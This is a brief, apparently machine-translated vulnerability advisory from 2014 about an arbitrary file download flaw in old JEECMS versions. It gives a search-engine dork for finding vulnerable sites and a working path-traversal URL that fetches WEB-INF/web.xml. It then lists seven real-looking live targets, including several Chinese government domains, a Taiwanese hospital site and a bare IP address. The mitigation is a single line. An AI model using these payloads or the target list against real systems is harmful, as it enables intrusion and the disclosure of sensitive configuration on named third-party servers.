JEECMS arbitrary File Download lead to sensitive information disclosure-vulnerability warning-the black bar safety net

2014-12-29T00:00:00
ID MYHACK58:62201457467
Type myhack58
Reporter 佚名
Modified 2014-12-29T00:00:00

Description

Should be JEECMS old version

inurl:download. jspx? path=

Arbitrary File Download

download. jspx? fpath=WEB-INF/web. xml&filename=WEB-INF/web.xml

Case 1

www.xxczj.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml

! tick. png

Case 2

www.zzcz.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml

Vulnerability to prove:

Case 3

ww. pyblr. gov. cn/download. jspx? fpath=WEB-INF/web. xml&filename=WEB-INF/web.xml

Case 4

home. chgh. org. tw/chgh/download. jspx? fpath=WEB-INF/web. xml&filename=WEB-INF/web.xml

Case 5

218.28.122.130/download. jspx? fpath=WEB-INF/web. xml&filename=WEB-INF/web.xml

Case 6

www.hbcdc.com.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml

Case 7

www.gyspzx.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml

Repair solutions:

File parameters filtered